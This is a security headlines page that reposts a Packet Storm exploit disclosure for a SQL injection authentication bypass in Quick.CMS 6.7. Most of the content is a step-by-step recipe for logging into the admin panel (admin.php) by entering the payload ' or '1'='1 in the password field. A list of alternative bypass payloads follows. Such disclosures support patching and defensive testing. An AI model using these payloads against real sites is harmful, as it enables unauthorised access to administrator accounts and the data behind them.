Security
Headlines
HeadlinesLatestCVEs

Headline

Quick.CMS 6.7 SQL Injection

Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
#sql#vulnerability#windows#google#php#auth
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass# Google Dork: N/A# Date: 02-03-2024# Exploit Author: ./H4X.Forensics - Diyar# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/># Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]# Version: 6.7# Tested on: Windows# CVE : N/AHow to exploit :*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php*--> Enter any Email like : [email protected]<mailto:[email protected]>*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Tick the Checkbox*--> Press Login*--> Congratz! *--> SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Payloads Can be use :' or '1'='1' or ''='' or 1]%00' or /* or '' or "a" or '' or 1 or '' or true() or '

Packet Storm: Latest News

Debian Security Advisory 5804-1